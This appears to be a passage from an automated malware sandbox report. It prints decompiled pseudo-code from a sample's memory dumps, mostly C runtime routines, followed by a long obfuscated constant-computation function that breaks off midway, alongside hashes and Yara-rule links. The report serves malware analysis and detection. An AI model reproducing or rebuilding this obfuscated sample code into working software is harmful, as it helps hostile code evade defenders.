Part of subcall function 10001000: LoadResource.KERNEL32(?,?), ref: 10001022

_memcpy_s.LIBCMT ref: 100022A3

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadResource_memcpy_s
String ID:
API String ID: 2436006741-0
Opcode ID: a25b6bb188c91d001fdae94177afacc97509be89fb70940ad3afcefcf4171009
Instruction ID: b15d77878478dc1b1b398a51fed4e35649185b01df43b18de1a3ee580a6edc72
Opcode Fuzzy Hash: a25b6bb188c91d001fdae94177afacc97509be89fb70940ad3afcefcf4171009
Instruction Fuzzy Hash: 42015AB6A00204BFE704DFA8C885DAAB7B9FF49294B10496DF5559B311DBB1ED408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010B49, Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E10010B49(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				long* _t24;
				intOrPtr _t25;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr _t33;

				_t27 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_push(4);
				E10013978(E10025D36, __ebx, __edi, __esi);
				_t30 = __ecx;
				_t33 =  *((intOrPtr*)(_t31 + 8));
				_t34 = _t33 == 0;
				if(_t33 == 0) {
					L1:
					E1000572D(_t22, _t23, _t27, _t30, _t34);
				}
				if( *_t30 == 0) {
					_t23 =  *0x1005873c; // 0x10058740
					if(_t23 != 0) {
						L5:
						_t19 = E1001083A(_t23); // executed
						 *_t30 = _t19;
						if(_t19 == 0) {
							goto L1;
						}
					} else {
						 *((intOrPtr*)(_t31 - 0x10)) = 0x10058740;
						 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
						_t21 = E10010952(0x10058740);
						 *(_t31 - 4) =  *(_t31 - 4) | 0xffffffff;
						_t23 = _t21;
						 *0x1005873c = _t21;
						if(_t21 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t24 =  *0x1005873c; // 0x10058740
				_t28 = E1001071D(_t24,  *_t30);
				_t39 = _t28;
				if(_t28 == 0) {
					_t17 =  *((intOrPtr*)(_t31 + 8))();
					_t25 =  *0x1005873c; // 0x10058740
					E100109F9(_t22, _t25, _t17, _t30, _t39,  *_t30, _t17);
				}
				return E10013A50(_t28);
			}

0x10010b49
0x10010b49
0x10010b49
0x10010b49
0x10010b50
0x10010b55
0x10010b59
0x10010b5f
0x10010b61
0x10010b63
0x10010b63
0x10010b63
0x10010b6b
0x10010b6d
0x10010b75
0x10010b98
0x10010b98
0x10010b9d
0x10010ba1
0x00000000
0x00000000
0x10010b77
0x10010b7c
0x10010b7f
0x10010b83
0x10010b88
0x10010b8c
0x10010b8e
0x10010b96
0x00000000
0x00000000
0x00000000
0x00000000
0x10010b96
0x10010b75
0x10010ba5
0x10010bb0
0x10010bb2
0x10010bb4
0x10010bb6
0x10010bb9
0x10010bc4
0x10010bc4
0x10010bd0

APIs

__EH_prolog3.LIBCMT ref: 10010B50

Part of subcall function 1000572D: __CxxThrowException@8.LIBCMT ref: 10005743
Part of subcall function 1000572D: __EH_prolog3.LIBCMT ref: 10005750

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3$Exception@8Throw
String ID:
API String ID: 2489616738-0
Opcode ID: 1a91a4b822c4349277d2419dcfc7cdceb187e80c532e68ff79f973ade7027299
Instruction ID: a14cd5ab5aa9f76afacdcabbe19c4800d94dcf15ec5d077052dd9b871e745070
Opcode Fuzzy Hash: 1a91a4b822c4349277d2419dcfc7cdceb187e80c532e68ff79f973ade7027299
Instruction Fuzzy Hash: CB017C78B09247DBEB15DF24C8A162D76E2EF842A4B21842DF8C19F291DFB1DD80DB01

Uniqueness

Uniqueness Score: -1.00%

Function 10005184, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10005184(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				void* __edi;
				intOrPtr* _t11;
				void* _t13;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t18;

				_t18 = _a4;
				_t17 = __ecx;
				if(_t18 >= 0) {
					_t11 = E10013020(_t13, _t16, __ecx, (_t18 + 1) * _a8 + 0x10); // executed
					if(_t11 == 0) {
						goto L1;
					}
					 *(_t11 + 4) =  *(_t11 + 4) & 0x00000000;
					 *_t11 = _t17;
					 *((intOrPtr*)(_t11 + 0xc)) = 1;
					 *((intOrPtr*)(_t11 + 8)) = _t18;
					return _t11;
				}
				L1:
				return 0;
			}

0x1000518a
0x1000518e
0x10005192
0x100051a3
0x100051ab
0x00000000
0x00000000
0x100051ad
0x100051b1
0x100051b3
0x100051ba
0x00000000
0x100051ba
0x10005194
0x00000000

APIs

_malloc.LIBCMT ref: 100051A3

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: 41b492baab74383cf0c07ff0df5eb855191977cf9a6203c6d9a73aaf946b294d
Instruction ID: c5a2c74993b839c8385210c93fce58ce6db3536342548be8301b0b250f9bc65c
Opcode Fuzzy Hash: 41b492baab74383cf0c07ff0df5eb855191977cf9a6203c6d9a73aaf946b294d
Instruction Fuzzy Hash: 64E06D325006156BE704CB49D414B87F7DCEF913B2F16C426E904CF152C7B2E8448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10010789, Relevance: 1.5, APIs: 1, Instructions: 21
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E10010789(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t19;
				void* _t20;

				_push(8);
				E100139AB(E10025CF0, __ebx, __edi, __esi);
				_t19 = __ecx;
				if( *__ecx == 0) {
					E1000FD0E(0x10);
					 *(_t20 - 4) =  *(_t20 - 4) & 0x00000000;
					if( *__ecx == 0) {
						 *__ecx =  *((intOrPtr*)(_t20 + 8))();
					}
					 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
					E1000FD80(0x10);
				}
				return E10013A50( *_t19);
			}

0x10010789
0x10010790
0x10010795
0x1001079b
0x1001079f
0x100107a6
0x100107ac
0x100107b1
0x100107b1
0x100107b3
0x100107b9
0x100107b9
0x100107c5

APIs

__EH_prolog3_catch.LIBCMT ref: 10010790

Part of subcall function 1000FD0E: EnterCriticalSection.KERNEL32(10058688,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD48
Part of subcall function 1000FD0E: InitializeCriticalSection.KERNEL32(?,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD5A
Part of subcall function 1000FD0E: LeaveCriticalSection.KERNEL32(10058688,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD67
Part of subcall function 1000FD0E: EnterCriticalSection.KERNEL32(?,?,?,?,?,100107A4,00000010,00000008,10006E1A,10006DBD,10005749,100012B7,1F496801), ref: 1000FD77

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: c5cc48c3739935cf9b80377123132dfd008962926f738b57786818283711544c
Instruction ID: 3432040f5b13ee53f55e1b908759e2a9ef20251863bc85cc40dc03068e40f391
Opcode Fuzzy Hash: c5cc48c3739935cf9b80377123132dfd008962926f738b57786818283711544c
Instruction Fuzzy Hash: 27E01A386003069BE760EF64C546759B7E0EF107A0F618A29F9D1DF2C4DAB0E9809B11

Uniqueness

Uniqueness Score: -1.00%

Function 1001B3E8, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001B3E8(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x10058cc4 = _t6;
				if(_t6 != 0) {
					 *0x1005a4a0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x1001b3fd
0x1001b403
0x1001b40a
0x1001b411
0x1001b417
0x1001b40d
0x1001b40d
0x1001b40d

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,?,100132CB,00000001,?,?,?,10013444,?,?,?,1002E338,0000000C,100134FF), ref: 1001B3FD

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 60564da12fe643bf5d50389faa71d37d0fa31a8d4da788e2299fa722290febab
Instruction ID: d4d5c716e4bc22c3a22e1695e2ba674db7c107ffbf7b764c23ecf7906ac6f5f8
Opcode Fuzzy Hash: 60564da12fe643bf5d50389faa71d37d0fa31a8d4da788e2299fa722290febab
Instruction Fuzzy Hash: 84D05E329903559EF7109FB05D497623BDCE384295F108475F90CC6290E770C991C600

Uniqueness

Uniqueness Score: -1.00%

Function 100165B1, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E100165B1() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E1001646F(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x100165b1
0x100165b3
0x100165b5
0x100165b7
0x100165bf

APIs

_doexit.LIBCMT ref: 100165B7

Part of subcall function 1001646F: __lock.LIBCMT ref: 1001647D
Part of subcall function 1001646F: __decode_pointer.LIBCMT ref: 100164B4
Part of subcall function 1001646F: __decode_pointer.LIBCMT ref: 100164C9
Part of subcall function 1001646F: __decode_pointer.LIBCMT ref: 100164F3
Part of subcall function 1001646F: __decode_pointer.LIBCMT ref: 10016509
Part of subcall function 1001646F: __decode_pointer.LIBCMT ref: 10016516
Part of subcall function 1001646F: __initterm.LIBCMT ref: 10016545
Part of subcall function 1001646F: __initterm.LIBCMT ref: 10016555

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
Instruction ID: e5a0bdfa33325cd989d233ebfa9e6db794bd7133c375fba661c96df882c7c239
Opcode Fuzzy Hash: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
Instruction Fuzzy Hash: 37A00269BD430462F8A091586C63F6421025755F01FD40050BB482C1C1A4D662984057

Uniqueness

Uniqueness Score: -1.00%

Function 100183FC, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100183FC() {
				void* _t1;

				_t1 = E1001838A(0); // executed
				return _t1;
			}

0x100183fe
0x10018404

APIs

__encode_pointer.LIBCMT ref: 100183FE

Part of subcall function 1001838A: TlsGetValue.KERNEL32(00000000,?,10018403,00000000,1002128E,10058CC8,00000000,00000314,?,1001B5FB,10058CC8,Microsoft Visual C++ Runtime Library,00012010), ref: 1001839C
Part of subcall function 1001838A: TlsGetValue.KERNEL32(00000005,?,10018403,00000000,1002128E,10058CC8,00000000,00000314,?,1001B5FB,10058CC8,Microsoft Visual C++ Runtime Library,00012010), ref: 100183B3
Part of subcall function 1001838A: RtlEncodePointer.NTDLL(00000000,?,10018403,00000000,1002128E,10058CC8,00000000,00000314,?,1001B5FB,10058CC8,Microsoft Visual C++ Runtime Library,00012010), ref: 100183F1

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 8ae207440ed6f49e0e1de95942fc5b536c7b8c58148ad3754b09db6cf4ea8c61
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04722735, Relevance: 32.0, Strings: 25, Instructions: 709
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E04722735(void* __ecx, signed int* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44, intOrPtr _a48) {
				signed int* _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _t820;
				signed int _t822;
				void* _t826;
				signed int* _t827;
				signed int _t843;
				void* _t857;
				signed int _t859;
				signed int _t863;
				void* _t908;
				void* _t918;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t944;
				signed int* _t950;
				void* _t954;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_v4 = __edx;
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4 & 0x0000ffff);
				_push(__edx);
				_push(__ecx);
				E0472DD01(_a4 & 0x0000ffff);
				_v304 = 0x45d9c0;
				_t950 =  &(( &_v304)[0xe]);
				_v304 = _v304 ^ 0xe57c40e0;
				_t17 =  &_v304; // 0xe57c40e0
				_t859 = 0;
				_t857 = 0;
				_v292 = 0;
				_t926 = 0x2d;
				_t942 = 0xc3867ef;
				_v304 =  *_t17 * 0x25;
				_v304 = _v304 + 0xffffc917;
				_v304 = _v304 ^ 0x2152eab7;
				_v24 = 0x754935;
				_t25 =  &_v24; // 0x754935
				_v24 =  *_t25 / _t926;
				_v24 = _v24 ^ 0x00029b29;
				_v20 = 0xfc2023;
				_v20 = _v20 | 0xe39b715b;
				_v20 = _v20 ^ 0xe3ff71b3;
				_v88 = 0x5b6f55;
				_v88 = _v88 + 0xea06;
				_v88 = _v88 ^ 0x005cd95b;
				_v48 = 0x835bd;
				_v48 = _v48 + 0xffff9d20;
				_v48 = _v48 ^ 0x000792dd;
				_v216 = 0x3e6722;
				_v216 = _v216 + 0xffffc55e;
				_v216 = _v216 | 0xc0851eb6;
				_v216 = _v216 >> 8;
				_v216 = _v216 ^ 0x0080bf3e;
				_v16 = 0xc77606;
				_v16 = _v16 + 0xb5b2;
				_v16 = _v16 ^ 0x00cc2bb8;
				_v176 = 0x73df04;
				_v176 = _v176 + 0xffff1814;
				_v176 = _v176 + 0x7763;
				_v176 = _v176 ^ 0x04736e7b;
				_v256 = 0xabfe49;
				_v256 = _v256 + 0xffff3f44;
				_v256 = _v256 >> 0xe;
				_v256 = _v256 | 0x8b011644;
				_v256 = _v256 ^ 0x8b0916ec;
				_v156 = 0x4c99bc;
				_v156 = _v156 >> 8;
				_v156 = _v156 ^ 0xd778d5ac;
				_v156 = _v156 ^ 0xd7789b35;
				_v200 = 0xdca033;
				_v200 = _v200 + 0xf4c;
				_v200 = _v200 * 0x5d;
				_v200 = _v200 + 0xffff1042;
				_v200 = _v200 ^ 0x502ad065;
				_v264 = 0xc3dba3;
				_v264 = _v264 << 5;
				_v264 = _v264 ^ 0xf4b2413b;
				_v264 = _v264 ^ 0x695654bc;
				_v264 = _v264 ^ 0x059f61e7;
				_v12 = 0x5d8ea;
				_t927 = 0x57;
				_v12 = _v12 / _t927;
				_v12 = _v12 ^ 0x00001134;
				_v276 = 0x6c9344;
				_t928 = 0x7b;
				_v276 = _v276 / _t928;
				_v276 = _v276 << 7;
				_t929 = 0x1b;
				_v276 = _v276 / _t929;
				_v276 = _v276 ^ 0x00042f0a;
				_v172 = 0xcc474f;
				_v172 = _v172 + 0x82d7;
				_v172 = _v172 >> 0xf;
				_v172 = _v172 ^ 0x00000186;
				_v60 = 0xc39f41;
				_t930 = 0x54;
				_v60 = _v60 * 0x5c;
				_v60 = _v60 ^ 0x464d3b43;
				_v128 = 0x3e497b;
				_t142 =  &_v128; // 0x3e497b
				_v128 =  *_t142 * 0x2e;
				_v128 = _v128 | 0x0453ffbc;
				_v128 = _v128 ^ 0x0f73ffbd;
				_v152 = 0xbc015f;
				_v152 = _v152 / _t930;
				_t931 = 0x45;
				_v152 = _v152 * 0x74;
				_v152 = _v152 ^ 0x01039eec;
				_v304 = 0xd10aa8;
				_v304 = _v304 / _t931;
				_v304 = _v304 >> 4;
				_v304 = _v304 ^ 0xba11c160;
				_v304 = _v304 ^ 0xba1984b9;
				_v300 = 0x76e655;
				_v300 = _v300 | 0xe53f5d7f;
				_v300 = _v300 ^ 0xe57b7711;
				_v300 = 0xa8c146;
				_t932 = 0x43;
				_v300 = _v300 * 0x2a;
				_v300 = _v300 ^ 0xa0545a0e;
				_v300 = _v300 ^ 0xbbf107a2;
				_v296 = 0xe28d91;
				_v296 = _v296 / _t932;
				_v296 = _v296 ^ 0x0004da2f;
				_v304 = 0x1a9f1b;
				_v304 = _v304 ^ 0xd7c5a97f;
				_v304 = _v304 >> 0xb;
				_v304 = _v304 | 0xf3f2942a;
				_v304 = _v304 ^ 0xf3f307f4;
				_v300 = 0x989e91;
				_v300 = _v300 << 0xc;
				_v300 = _v300 | 0x1547a920;
				_v300 = _v300 ^ 0x9defbc3f;
				_v296 = 0x625589;
				_v296 = _v296 | 0x4cd29f56;
				_v296 = _v296 ^ 0x4cf826f4;
				_v300 = 0xe627de;
				_v300 = _v300 ^ 0x5ed4c95f;
				_v300 = _v300 ^ 0x35662df9;
				_v300 = _v300 ^ 0x6b586730;
				_v304 = 0xbc944d;
				_v304 = _v304 ^ 0x466b4821;
				_v304 = _v304 + 0xffff9ec6;
				_t933 = 0x2a;
				_v304 = _v304 / _t933;
				_v304 = _v304 ^ 0x01a2f75e;
				_v300 = 0xcc45ec;
				_t934 = 0x76;
				_v300 = _v300 * 0x32;
				_v300 = _v300 | 0x16aac49a;
				_v300 = _v300 ^ 0x37ed3570;
				_v296 = 0x9d9dcd;
				_v296 = _v296 << 0xd;
				_v296 = _v296 ^ 0xb3bc56ed;
				_v296 = 0xb1a444;
				_v296 = _v296 * 0x6a;
				_v296 = _v296 ^ 0x4986ebdb;
				_v64 = 0x1b0fec;
				_v64 = _v64 * 0x7c;
				_v64 = _v64 ^ 0x0d1944e9;
				_v132 = 0x5a0190;
				_v132 = _v132 >> 0xf;
				_v132 = _v132 ^ 0x5628d064;
				_v132 = _v132 ^ 0x562abc33;
				_v192 = 0xf086d3;
				_v192 = _v192 | 0xafb9d9bf;
				_v192 = _v192 + 0xffff052d;
				_v192 = _v192 ^ 0xaff3bec8;
				_v180 = 0x844667;
				_v180 = _v180 | 0x976b6ecd;
				_v180 = _v180 + 0x99d6;
				_v180 = _v180 >> 0xa;
				_v180 = _v180 ^ 0x0023d32c;
				_v188 = 0xd3da47;
				_v188 = _v188 | 0x33fb47fd;
				_v188 = _v188 ^ 0x33fb905c;
				_v32 = 0xad8b24;
				_v32 = _v32 / _t934;
				_v32 = _v32 ^ 0x000c83cf;
				_v100 = 0x2a3544;
				_v100 = _v100 + 0xffff8dc1;
				_v100 = _v100 >> 5;
				_v100 = _v100 ^ 0x00034585;
				_v164 = 0x5d4a19;
				_t935 = 0x1d;
				_v164 = _v164 / _t935;
				_t936 = 0x4a;
				_v164 = _v164 / _t936;
				_v164 = _v164 ^ 0x000bff9d;
				_v96 = 0xcabe5;
				_v96 = _v96 | 0x7a7bdbee;
				_v96 = _v96 ^ 0x7a724258;
				_v212 = 0x8f13f5;
				_v212 = _v212 | 0x2ff6f3ea;
				_t937 = 0x51;
				_v212 = _v212 * 0x21;
				_v212 = _v212 ^ 0x2ff18a80;
				_v296 = 0x2690d;
				_v296 = _v296 + 0xffff2cd9;
				_v296 = _v296 ^ 0x0000fddf;
				_v120 = 0xb02888;
				_v120 = _v120 << 0xe;
				_v120 = _v120 | 0x7bdb8a73;
				_v120 = _v120 ^ 0x7bfd8793;
				_v28 = 0x9d5856;
				_v28 = _v28 + 0xffff6417;
				_v28 = _v28 ^ 0x0093a2f6;
				_v36 = 0xb9f0c0;
				_v36 = _v36 ^ 0x3cbfda17;
				_v36 = _v36 ^ 0x3c07a1f0;
				_v220 = 0x4ac651;
				_v220 = _v220 + 0xfb7e;
				_v220 = _v220 + 0xffff2418;
				_v220 = _v220 >> 0x10;
				_v220 = _v220 ^ 0x000bf762;
				_v56 = 0x9efc48;
				_v56 = _v56 + 0xffff2334;
				_v56 = _v56 ^ 0x0090796b;
				_v224 = 0x60486f;
				_v224 = _v224 >> 4;
				_v224 = _v224 + 0xffff1f86;
				_v224 = _v224 << 0xd;
				_v224 = _v224 ^ 0xa482b891;
				_v272 = 0xfa5a8b;
				_v272 = _v272 * 0x29;
				_v272 = _v272 + 0xffffb12d;
				_v272 = _v272 * 0x44;
				_v272 = _v272 ^ 0xa660528b;
				_v108 = 0xabad51;
				_v108 = _v108 >> 1;
				_v108 = _v108 >> 5;
				_v108 = _v108 ^ 0x000303e1;
				_v208 = 0xc2370f;
				_v208 = _v208 | 0xb6ce98f3;
				_v208 = _v208 >> 0x10;
				_v208 = _v208 | 0x32a6df4f;
				_v208 = _v208 ^ 0x32a1a2b2;
				_v284 = 0xdbe163;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0xffff344d;
				_v284 = _v284 * 0x61;
				_v284 = _v284 ^ 0xa07c17b2;
				_v184 = 0x18883c;
				_v184 = _v184 << 3;
				_v184 = _v184 + 0xc036;
				_v184 = _v184 << 0xf;
				_v184 = _v184 ^ 0x810297d9;
				_v148 = 0xb83d8d;
				_v148 = _v148 >> 1;
				_v148 = _v148 + 0xffffe0d6;
				_v148 = _v148 ^ 0x0052d5b3;
				_v248 = 0xa4d991;
				_v248 = _v248 / _t937;
				_v248 = _v248 + 0x983a;
				_v248 = _v248 << 7;
				_v248 = _v248 ^ 0x015c1315;
				_v280 = 0xa90ebd;
				_v280 = _v280 ^ 0xb555a367;
				_v280 = _v280 << 0xd;
				_v280 = _v280 ^ 0x3f87c0af;
				_v280 = _v280 ^ 0xaa30da04;
				_v140 = 0x28434d;
				_v140 = _v140 >> 6;
				_v140 = _v140 >> 8;
				_v140 = _v140 ^ 0x000e9890;
				_v232 = 0xe5659e;
				_v232 = _v232 + 0x3a58;
				_v232 = _v232 << 6;
				_t938 = 0x26;
				_v232 = _v232 * 0x1e;
				_v232 = _v232 ^ 0xba2194fc;
				_v116 = 0x422c5b;
				_v116 = _v116 >> 8;
				_v116 = _v116 * 0x2b;
				_v116 = _v116 ^ 0x0000cb4c;
				_v268 = 0xa49365;
				_v268 = _v268 + 0xffffc63c;
				_v268 = _v268 + 0xffffcbd6;
				_v268 = _v268 + 0x7990;
				_v268 = _v268 ^ 0x00a3a6d0;
				_v76 = 0x8ca639;
				_v76 = _v76 * 0x17;
				_v76 = _v76 ^ 0x0ca05c22;
				_v84 = 0x5620e7;
				_v84 = _v84 | 0x763d566c;
				_v84 = _v84 ^ 0x76701a0e;
				_v160 = 0xef04b;
				_v160 = _v160 | 0xdf25e515;
				_v160 = _v160 << 0xa;
				_v160 = _v160 ^ 0xbfd76d6b;
				_v168 = 0x510524;
				_v168 = _v168 << 3;
				_v168 = _v168 + 0xffff9b45;
				_v168 = _v168 ^ 0x0283568b;
				_v260 = 0x3a74cf;
				_v260 = _v260 + 0xffff3811;
				_v260 = _v260 / _t938;
				_v260 = _v260 + 0xe13f;
				_v260 = _v260 ^ 0x000cf428;
				_v52 = 0x359763;
				_t939 = 0x77;
				_v52 = _v52 / _t939;
				_v52 = _v52 ^ 0x0008a68a;
				_v236 = 0x119d06;
				_v236 = _v236 ^ 0x35296ade;
				_v236 = _v236 + 0xffff1c44;
				_t940 = 0x72;
				_v236 = _v236 * 0x5a;
				_v236 = _v236 ^ 0xb5b153cf;
				_v244 = 0x402b49;
